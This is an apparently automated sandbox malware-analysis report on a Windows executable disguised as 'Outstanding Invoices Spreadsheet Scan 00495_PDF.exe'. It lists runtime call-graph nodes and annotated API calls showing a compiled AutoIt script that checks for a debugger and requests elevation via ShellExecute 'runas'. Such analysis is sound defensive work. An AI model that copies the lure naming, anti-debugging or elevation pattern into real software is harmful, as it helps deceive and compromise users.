85449->85590 85453 41c47b 85591 417f36 67 API calls __getptd_noexit 85453->85591 85455 41c46e 85592 41c4a1 LeaveCriticalSection __unlock_fhandle 85455->85592 85457->85351 85458->85348 85459->85373 85461->85388 85462->85388 85466 417004 85463->85466 85465 417041 85465->85392 85469 41ba3b 85465->85469 85466->85465 85467 417022 Sleep 85466->85467 85480 422452 85466->85480 85468 417037 85467->85468 85468->85465 85468->85466 85471 41ba47 __setmode 85469->85471 85470 41baa2 85473 41bac4 __setmode 85470->85473 85474 41baa7 EnterCriticalSection 85470->85474 85471->85470 85472 418407 __lock 67 API calls 85471->85472 85475 41ba73 85472->85475 85473->85392 85474->85473 85476 41ba8a 85475->85476 85493 4189e6 InitializeCriticalSectionAndSpinCount __setmode 85475->85493 85494 41bad2 LeaveCriticalSection _doexit 85476->85494 85479->85380 85481 42245e __setmode 85480->85481 85482 422495 _memset 85481->85482 85483 422476 85481->85483 85486 422507 HeapAlloc 85482->85486 85488 411afc _realloc 6 API calls 85482->85488 85489 418407 __lock 66 API calls 85482->85489 85490 42248b __setmode 85482->85490 85491 41a74c ___sbh_alloc_block 5 API calls 85482->85491 85492 42254e __calloc_impl LeaveCriticalSection 85482->85492 85484 417f23 __setmode 66 API calls 85483->85484 85485 42247b 85484->85485 85487 417ebb __setmode 6 API calls 85485->85487 85486->85482 85487->85490 85488->85482 85489->85482 85490->85466 85491->85482 85492->85482 85493->85476 85494->85470 85496 41b9d1 85495->85496 85498 41b9e9 85495->85498 85510 417f36 67 API calls __getptd_noexit 85496->85510 85502 41ba2e 85498->85502 85512 417f36 67 API calls __getptd_noexit 85498->85512 85499 41b9d6 85511 417f23 67 API calls __getptd_noexit 85499->85511 85502->85406 85503 41ba17 85513 417f23 67 API calls __getptd_noexit 85503->85513 85504 41b9de 85504->85406 85506 41ba1e 85514 417ebb 6 API calls 2 library calls 85506->85514 85508->85412 85509->85412 85510->85499 85511->85504 85512->85503 85513->85506 85515->85423 85516->85424 85518 41bcab __write_nolock 85517->85518 85519 41bd04 85518->85519 85520 41bcdd 85518->85520 85570 41bcd2 85518->85570 85523 41bd6c 85519->85523 85524 41bd46 85519->85524 85602 417f36 67 API calls __getptd_noexit 85520->85602 85528 41bd83 85523->85528 85529 41bd72 85523->85529 85605 417f36 67 API calls __getptd_noexit 85524->85605 85525 41c3cd 85525->85455 85526 41bce2 85603 417f23 67 API calls __getptd_noexit 85526->85603 85593 423649 85528->85593 85608 423462 69 API calls 3 library calls 85529->85608 85532 41bd4b 85606 417f23 67 API calls __getptd_noexit 85532->85606 85534 41bce9 85604 417ebb 6 API calls 2 library calls 85534->85604 85536 41bd8b 85539 41c031 85536->85539 85609 416c72 67 API calls 2 library calls 85536->85609 85538 41bd80 85538->85528 85542 41c041 85539->85542 85543 41c300 WriteFile 85539->85543 85540 41bd54 85607 417ebb 6 API calls 2 library calls 85540->85607 85545 41c11f 85542->85545 85559 41c055 85542->85559 85547 41c333 GetLastError 85543->85547 85550 41c31e 85543->85550 85562 41c1ff 85545->85562 85566 41c12e 85545->85566 85546 41bda6 GetConsoleMode 85546->85539 85549 41bdd1 85546->85549 85547->85550 85548 41c384 85552 41c37e 85548->85552 85549->85539 85551 41bde3 GetConsoleCP 85549->85551 85550->85552 85553 41c351 85550->85553 85550->85570 85551->85550 85579 41be06 85551->85579 85552->85548 85552->85570 85616 417f23 67 API calls __getptd_noexit 85552->85616 85556 41c370 85553->85556 85557 41c35c 85553->85557 85555 41c265 WideCharToMultiByte 85555->85547 85564 41c29c WriteFile 85555->85564 85615 417f49 67 API calls 3 library calls 85556->85615 85613 417f23 67 API calls __getptd_noexit 85557->85613 85558 41c0c3 WriteFile 85558->85547 85568 41c066 85558->85568 85559->85548 85559->85558 85560 41c3a1 85617 417f36 67 API calls __getptd_noexit 85560->85617 85562->85548 85562->85555 85572 41c2d3 GetLastError 85564->85572 85577 41c2c7 85564->85577 85565 41c1a3 WriteFile 85565->85547 85571 41c139 85565->85571 85566->85548 85566->85565 85568->85550 85568->85559 85575 41c013 85568->85575 85569 41c361 85614 417f36 67 API calls __getptd_noexit 85569->85614 85618 421fa7 5 API calls __invoke_watson 85570->85618 85571->85550 85571->85566 85571->85575 85572->85577 85575->85550 85577->85550 85577->85562 85577->85564 85577->85575 85578 42513e 11 API calls __putwch_nolock 85583 41be82 85578->85583 85579->85550 85579->85575 85580 41beb2 WideCharToMultiByte 85579->85580 85579->85583 85610 41348a 77 API calls __isleadbyte_l 85579->85610 85611 423961 79 API calls __woutput_l 85579->85611 85612 423961 79 API calls __woutput_l 85579->85612 85580->85550 85582 41bee3 WriteFile 85580->85582 85582->85547 85582->85583 85583->85547 85583->85550 85583->85578 85583->85579 85583->85580 85584 41bf37 WriteFile 85583->85584 85584->85547 85584->85583 85585->85438 85586->85444 85587->85441 85588->85447 85590->85453 85591->85455 85592->85444 85594 423656 85593->85594 85595 423665 85593->85595 85596 417f23 __setmode 67 API calls 85594->85596 85598 423689 85595->85598 85599 417f23 __setmode 67 API calls 85595->85599 85597 42365b 85596->85597 85597->85536 85598->85536 85600 423679 85599->85600 85601 417ebb __setmode 6 API calls 85600->85601 85601->85598 85602->85526 85603->85534 85605->85532 85606->85540 85608->85538 85609->85546 85610->85579 85611->85583 85612->85579 85613->85569 85614->85570 85615->85570 85616->85560 85617->85570 85618->85525 85622 415588 __setmode 85619->85622 85620 415596 85650 417f23 67 API calls __getptd_noexit 85620->85650 85621 4155c4 85632 415965 85621->85632 85622->85620 85622->85621 85625 41559b 85651 417ebb 6 API calls 2 library calls 85625->85651 85631 4155ab __setmode 85631->85166 85633 415977 85632->85633 85634 415999 EnterCriticalSection 85632->85634 85633->85634 85635 41597f 85633->85635 85636 4155cc 85634->85636 85637 418407 __lock 67 API calls 85635->85637 85638 4154f2 85636->85638 85637->85636 85639 415512 85638->85639 85640 415502 85638->85640 85642 415524 85639->85642 85653 4152e7 85639->85653 85707 417f23 67 API calls __getptd_noexit 85640->85707 85670 41486c 85642->85670 85645 415507 85652 4155f7 LeaveCriticalSection LeaveCriticalSection _fseek 85645->85652 85650->85625 85652->85631 85654 41531a 85653->85654 85655 4152fa 85653->85655 85656 41453a __fileno 67 API calls 85654->85656 85708 417f23 67 API calls __getptd_noexit 85655->85708 85659 415320 85656->85659 85658 4152ff 85709 417ebb 6 API calls 2 library calls 85658->85709 85661 41efd4 __locking 71 API calls 85659->85661 85662 415335 85661->85662 85663 4153a9 85662->85663 85665 415364 85662->85665 85669 41530f 85662->85669 85710 417f23 67 API calls __getptd_noexit 85663->85710 85666 41efd4 __locking 71 API calls 85665->85666 85665->85669 85667 415404 85666->85667 85668 41efd4 __locking 71 API calls 85667->85668 85667->85669 85668->85669 85669->85642 85671 4148a7 85670->85671 85672 414885 85670->85672 85676 41453a 85671->85676 85672->85671 85673 41453a __fileno 67 API calls 85672->85673 85674 4148a0 85673->85674 85675 41c3cf __locking 101 API calls 85674->85675 85675->85671 85677 41455e 85676->85677 85678 414549 85676->85678 85682 41efd4 85677->85682 85711 417f23 67 API calls __getptd_noexit 85678->85711 85680 41454e 85712 417ebb 6 API calls 2 library calls 85680->85712 85683 41efe0 __setmode 85682->85683 85684 41f003 85683->85684 85685 41efe8 85683->85685 85686 41f011 85684->85686 85691 41f052 85684->85691 85713 417f36 67 API calls __getptd_noexit 85685->85713 85715 417f36 67 API calls __getptd_noexit 85686->85715 85689 41efed 85714 417f23 67 API calls __getptd_noexit 85689->85714 85690 41f016 85716 417f23 67 API calls __getptd_noexit 85690->85716 85694 41ba3b ___lock_fhandle 68 API calls 85691->85694 85696 41f058 85694->85696 85695 41f01d 85717 417ebb 6 API calls 2 library calls 85695->85717 85698 41f065 85696->85698 85699 41f07b 85696->85699 85702 41ef5f __lseek_nolock 69 API calls 85698->85702 85718 417f23 67 API calls __getptd_noexit 85699->85718 85701 41eff5 __setmode 85701->85645 85703 41f073 85702->85703 85720 41f0a6 LeaveCriticalSection __unlock_fhandle 85703->85720 85704 41f080 85719 417f36 67 API calls __getptd_noexit 85704->85719 85707->85645 85708->85658 85710->85669 85711->85680 85713->85689 85714->85701 85715->85690 85716->85695 85718->85704 85719->85703 85720->85701 85722 414e31 85721->85722 85723 414e4d 85721->85723 85767 417f23 67 API calls __getptd_noexit 85722->85767 85724 414e46 85723->85724 85726 41486c __flush 101 API calls 85723->85726 85739 414f08 LeaveCriticalSection LeaveCriticalSection _fseek 85724->85739 85728 414e59 85726->85728 85727 414e36 85768 417ebb 6 API calls 2 library calls 85727->85768 85740 41e680 85728->85740 85732 41453a __fileno 67 API calls 85733 414e67 85732->85733 85744 41e5b3 85733->85744 85735 414e6d 85735->85724 85736 413a88 __read_nolock 67 API calls 85735->85736 85736->85724 85737->85177 85739->85180 85741 41e690 85740->85741 85742 414e61 85740->85742 85741->85742 85743 413a88 __read_nolock 67 API calls 85741->85743 85742->85732 85743->85742 85745 41e5bf __setmode 85744->85745 85746 41e5e2 85745->85746 85747 41e5c7 85745->85747 85749 41e5f0 85746->85749 85753 41e631 85746->85753 85769 417f36 67 API calls __getptd_noexit 85747->85769 85771 417f36 67 API calls __getptd_noexit 85749->85771 85751 41e5cc 85770 417f23 67 API calls __getptd_noexit 85751->85770 85752 41e5f5 85772 417f23 67 API calls __getptd_noexit 85752->85772 85756 41ba3b ___lock_fhandle 68 API calls 85753->85756 85758 41e637 85756->85758 85757 41e5fc 85773 417ebb 6 API calls 2 library calls 85757->85773 85760 41e652 85758->85760 85761 41e644 85758->85761 85774 417f23 67 API calls __getptd_noexit 85760->85774 85763 41e517 __close_nolock 70 API calls 85761->85763 85762 41e5d4 __setmode 85762->85735 85765 41e64c 85763->85765 85775 41e676 LeaveCriticalSection __unlock_fhandle 85765->85775 85767->85727 85769->85751 85770->85762 85771->85752 85772->85757 85774->85765 85775->85762 85777 415126 __setmode 85776->85777 85778 41513a _memset 85777->85778 85779 41516f 85777->85779 85780 415164 __setmode 85777->85780 85805 417f23 67 API calls __getptd_noexit 85778->85805 85781 415965 __lock_file 68 API calls 85779->85781 85780->85186 85782 415177 85781->85782 85789 414f10 85782->85789 85785 415154 85806 417ebb 6 API calls 2 library calls 85785->85806 85790 414f4c 85789->85790 85793 414f2e _memset 85789->85793 85807 4151a6 LeaveCriticalSection LeaveCriticalSection _fseek 85790->85807 85791 414f37 85858 417f23 67 API calls __getptd_noexit 85791->85858 85793->85790 85793->85791 85795 414f8b 85793->85795 85795->85790 85797 4150d5 _memset 85795->85797 85798 4150a9 _memset 85795->85798 85799 41453a __fileno 67 API calls 85795->85799 85808 41ed9e 85795->85808 85838 41e6b1 85795->85838 85860 41ee9b 67 API calls 3 library calls 85795->85860 85862 417f23 67 API calls __getptd_noexit 85797->85862 85861 417f23 67 API calls __getptd_noexit 85798->85861 85799->85795 85803 414f3c 85859 417ebb 6 API calls 2 library calls 85803->85859 85805->85785 85807->85780 85809 41edaa __setmode 85808->85809 85810 41edb2 85809->85810 85811 41edcd 85809->85811 85932 417f36 67 API calls __getptd_noexit 85810->85932 85812 41eddb 85811->85812 85817 41ee1c 85811->85817 85934 417f36 67 API calls __getptd_noexit 85812->85934 85815 41edb7 85933 417f23 67 API calls __getptd_noexit 85815->85933 85816 41ede0 85935 417f23 67 API calls __getptd_noexit 85816->85935 85820 41ee29 85817->85820 85821 41ee3d 85817->85821 85937 417f36 67 API calls __getptd_noexit 85820->85937 85822 41ba3b ___lock_fhandle 68 API calls 85821->85822 85825 41ee43 85822->85825 85823 41ede7 85936 417ebb 6 API calls 2 library calls 85823->85936 85828 41ee50 85825->85828 85829 41ee66 85825->85829 85826 41ee2e 85938 417f23 67 API calls __getptd_noexit 85826->85938 85827 41edbf __setmode 85827->85795 85863 41e7dc 85828->85863 85939 417f23 67 API calls __getptd_noexit 85829->85939 85834 41ee5e 85941 41ee91 LeaveCriticalSection __unlock_fhandle 85834->85941 85835 41ee6b 85940 417f36 67 API calls __getptd_noexit 85835->85940 85839 41e6c1 85838->85839 85842 41e6de 85838->85842 85965 417f23 67 API calls __getptd_noexit 85839->85965 85841 41e6c6 85966 417ebb 6 API calls 2 library calls 85841->85966 85844 41e713 85842->85844 85850 41e6d6 85842->85850 85962 423600 85842->85962 85846 41453a __fileno 67 API calls 85844->85846 85847 41e727 85846->85847 85848 41ed9e __read 79 API calls 85847->85848 85849 41e72e 85848->85849 85849->85850 85851 41453a __fileno 67 API calls 85849->85851 85850->85795 85852 41e751 85851->85852 85852->85850 85853 41453a __fileno 67 API calls 85852->85853 85854 41e75d 85853->85854 85854->85850 85855 41453a __fileno 67 API calls 85854->85855 85856 41e769 85855->85856 85857 41453a __fileno 67 API calls 85856->85857 85857->85850 85858->85803 85860->85795 85861->85803 85862->85803 85864 41e813 85863->85864 85865 41e7f8 85863->85865 85866 41e822 85864->85866 85869 41e849 85864->85869 85942 417f36 67 API calls __getptd_noexit 85865->85942 85944 417f36 67 API calls __getptd_noexit 85866->85944 85868 41e7fd 85943 417f23 67 API calls __getptd_noexit 85868->85943 85873 41e868 85869->85873 85884 41e87c 85869->85884 85872 41e827 85945 417f23 67 API calls __getptd_noexit 85872->85945 85947 417f36 67 API calls __getptd_noexit 85873->85947 85874 41e8d4 85949 417f36 67 API calls __getptd_noexit 85874->85949 85877 41e82e 85946 417ebb 6 API calls 2 library calls 85877->85946 85879 41e86d 85948 417f23 67 API calls __getptd_noexit 85879->85948 85882 41e8d9 85950 417f23 67 API calls __getptd_noexit 85882->85950 85883 41e874 85951 417ebb 6 API calls 2 library calls 85883->85951 85884->85874 85885 41e805 85884->85885 85887 41e8b0 85884->85887 85889 41e8f5 85884->85889 85885->85834 85887->85874 85892 41e8bb ReadFile 85887->85892 85891 416fb6 __malloc_crt 67 API calls 85889->85891 85893 41e90b 85891->85893 85894 41ed62 GetLastError 85892->85894 85895 41e9e7 85892->85895 85898 41e931 85893->85898 85899 41e913 85893->85899 85896 41ebe8 85894->85896 85897 41ed6f 85894->85897 85895->85894 85903 41e9fb 85895->85903 85911 41eb6d 85896->85911 85958 417f49 67 API calls 3 library calls 85896->85958 85960 417f23 67 API calls __getptd_noexit 85897->85960 85954 423462 69 API calls 3 library calls 85898->85954 85952 417f23 67 API calls __getptd_noexit 85899->85952 85903->85911 85912 41ea17 85903->85912 85915 41ec2d 85903->85915 85904 41e93d 85904->85892 85905 41ed74 85961 417f36 67 API calls __getptd_noexit 85905->85961 85906 41e918 85953 417f36 67 API calls __getptd_noexit 85906->85953 85910 413a88 __read_nolock 67 API calls 85910->85885 85911->85885 85911->85910 85913 41ea7d ReadFile 85912->85913 85920 41eafa 85912->85920 85918 41ea9b GetLastError 85913->85918 85923 41eaa5 85913->85923 85914 41eca5 ReadFile 85916 41ecc4 GetLastError 85914->85916 85924 41ecce 85914->85924 85915->85911 85915->85914 85916->85915 85916->85924 85917 41ebbe MultiByteToWideChar 85917->85911 85919 41ebe2 GetLastError 85917->85919 85918->85912 85918->85923 85919->85896 85920->85911 85921 41eb75 85920->85921 85922 41eb68 85920->85922 85926 41eb32 85920->85926 85921->85926 85927 41ebac 85921->85927 85956 417f23 67 API calls __getptd_noexit 85922->85956 85923->85912 85955 423462 69 API calls 3 library calls 85923->85955 85924->85915 85959 423462 69 API calls 3 library calls 85924->85959 85926->85917 85957 423462 69 API calls 3 library calls 85927->85957 85931 41ebbb 85931->85917 85932->85815 85933->85827 85934->85816 85935->85823 85937->85826 85938->85823 85939->85835 85940->85834 85941->85827 85942->85868 85943->85885 85944->85872 85945->85877 85947->85879 85948->85883 85949->85882 85950->85883 85952->85906 85953->85885 85954->85904 85955->85923 85956->85911 85957->85931 85958->85911 85959->85924 85960->85905 85961->85911 85963 416fb6 __malloc_crt 67 API calls 85962->85963 85964 423615 85963->85964 85964->85844 85965->85841 85970 414cef GetSystemTimeAsFileTime __aulldiv 85967->85970 85969 4431ef 85969->85189 85970->85969 85971->85196 85973->85202 85974->85061 85976 413c2f 85975->85976 85982 413bae 85975->85982 85977 413d60 85976->85977 85978 413d7b 85976->85978 86001 417f23 67 API calls __getptd_noexit 85977->86001 86003 417f23 67 API calls __getptd_noexit 85978->86003 85981 413d65 85983 413cfb 85981->85983 86002 417ebb 6 API calls 2 library calls 85981->86002 85982->85976 85986 413c1d 85982->85986 85997 41ab19 67 API calls __setmode 85982->85997 85983->85016 85986->85976 85993 413c9b 85986->85993 85998 41ab19 67 API calls __setmode 85986->85998 85987 413d03 85987->85976 85987->85983 85989 413d8e 85987->85989 85988 413cb9 85988->85976 85990 413cd6 85988->85990 85999 41ab19 67 API calls __setmode 85988->85999 86004 41ab19 67 API calls __setmode 85989->86004 85990->85976 85990->85983 85994 413cef 85990->85994 85993->85987 85993->85988 86000 41ab19 67 API calls __setmode 85994->86000 85997->85986 85998->85993 85999->85990 86000->85983 86001->85981 86003->85981 86004->85983 86006 436afa FindFirstFileW 86005->86006 86007 436b1d 86005->86007 86008 436b12 FindClose 86006->86008 86009 436b0b 86006->86009 86007->85074 86008->86007 86009->85074 86010->85108 86012 4146da __setmode 86011->86012 86013 414712 86012->86013 86014 4146f2 86012->86014 86015 414707 __setmode 86012->86015 86016 415965 __lock_file 68 API calls 86013->86016 86046 417f23 67 API calls __getptd_noexit 86014->86046 86015->85123 86018 41471a 86016->86018 86034 41456c 86018->86034 86019 4146f7 86047 417ebb 6 API calls 2 library calls 86019->86047 86025 434fa5 86024->86025 86026 434f8b SetFileTime CloseHandle 86024->86026 86025->85034 86026->86025 86032 4523e1 _wcscpy 86027->86032 86028 4151b0 81 API calls __fread_nolock 86028->86032 86029 44afdc GetSystemTimeAsFileTime 86029->86032 86030 452553 86030->85086 86030->85087 86031 41557c 105 API calls _fseek 86031->86032 86032->86028 86032->86029 86032->86030 86032->86031 86033->85126 86035 41457e 86034->86035 86045 41459f 86034->86045 86036 41458a 86035->86036 86043 4145bd _realloc 86035->86043 86035->86045 86049 417f23 67 API calls __getptd_noexit 86036->86049 86038 41458f 86050 417ebb 6 API calls 2 library calls 86038->86050 86041 41486c __flush 101 API calls 86041->86043 86042 41453a __fileno 67 API calls 86042->86043 86043->86041 86043->86042 86044 41c3cf __locking 101 API calls 86043->86044 86043->86045 86051 4191c9 101 API calls 7 library calls 86043->86051 86044->86043 86048 414746 LeaveCriticalSection LeaveCriticalSection _fseek 86045->86048 86046->86019 86048->86015 86049->86038 86051->86043 86052->85129 86933 4803f4 86934 48046c 86933->86934 86935 4804a7 86933->86935 86937 480499 86934->86937 86938 480473 86934->86938 86936 40c060 75 API calls 86935->86936 86953 4804b0 86936->86953 86966 47fea8 118 API calls 86937->86966 86940 480478 86938->86940 86941 48048b 86938->86941 86940->86935 86943 48047d 86940->86943 86965 47f6ef 118 API calls __itow_s 86941->86965 86964 47e8db 118 API calls 86943->86964 86944 40df50 75 API calls 86944->86953 86947 4092c0 VariantClear 86949 480b51 86947->86949 86948 480486 86948->86947 86951 4092c0 VariantClear 86949->86951 86950 40c3e0 75 API calls 86950->86953 86952 480b5a 86951->86952 86953->86944 86953->86948 86953->86950 86954 4019e0 76 API calls 86953->86954 86956 409210 VariantClear 86953->86956 86957 40e6d0 76 API calls 86953->86957 86958 480564 86953->86958 86960 40c760 78 API calls 86953->86960 86967 4533dc 75 API calls 86953->86967 86968 45e85e 76 API calls 86953->86968 86969 40e7e0 76 API calls 86953->86969 86970 476958 76 API calls 86953->86970 86971 47f529 117 API calls 86953->86971 86954->86953 86956->86953 86957->86953 86972 45e62e 116 API calls 3 library calls 86958->86972 86960->86953 86964->86948 86965->86948 86966->86948 86967->86953 86968->86953 86969->86953 86970->86953 86971->86953 86972->86948 86053 40116e 86054 401119 DefWindowProcW 86053->86054 86055 43522c 86056 435241 86055->86056 86057 43523b 86055->86057 86059 435254 86056->86059 86060 413a88 __read_nolock 67 API calls 86056->86060 86058 413a88 __read_nolock 67 API calls 86057->86058 86058->86056 86061 435267 86059->86061 86062 413a88 __read_nolock 67 API calls 86059->86062 86060->86059 86062->86061

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                                • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                                • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                                • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                                • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                              • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                              • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                              • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,00000004), ref: 0040D7D6
                                                                              • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                              • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,00000004), ref: 00431B0E
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,00000004), ref: 00431B3F
                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                              • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                              • String ID: @GH$@GH$C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                              • API String ID: 2493088469-4291044231
                                                                              • Opcode ID: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                              • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                              • Opcode Fuzzy Hash: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                              • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 320 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 329 40e506-40e509 320->329 330 42accc-42acd1 320->330 333 40e540-40e555 call 40ee70 329->333 334 40e50b-40e51c 329->334 331 42acd3-42acdb 330->331 332 42acdd-42ace0 330->332 335 42ad12-42ad20 331->335 336 42ace2-42aceb 332->336 337 42aced-42acf0 332->337 351 40e557-40e573 GetCurrentProcess call 40ee30 333->351 352 40e579-40e5a8 333->352 338 40e522-40e525 334->338 339 42ac9b-42aca7 334->339 350 42ad28-42ad2d GetSystemInfo 335->350 336->335 337->335 341 42acf2-42ad06 337->341 338->333 342 40e527-40e537 338->342 344 42acb2-42acba 339->344 345 42aca9-42acad 339->345 346 42ad08-42ad0c 341->346 347 42ad0e 341->347 348 42acbf-42acc7 342->348 349 40e53d 342->349 344->333 345->333 346->335 347->335 348->333 349->333 353 42ad38-42ad3d GetSystemInfo 350->353 351->352 361 40e575 351->361 352->353 354 40e5ae-40e5c3 call 40eee0 352->354 354->350 359 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 354->359 364 40e5e0-40e5ef 359->364 365 40e5dd-40e5de FreeLibrary 359->365 361->352 366 40e5f1-40e5f2 FreeLibrary 364->366 367 40e5f4-40e5ff 364->367 365->364 366->367
                                                                              APIs
                                                                              • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                              • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                              • String ID: pMH
                                                                              • API String ID: 2923339712-2522892712
                                                                              • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                              • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                              • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                              • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                              APIs
                                                                              • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
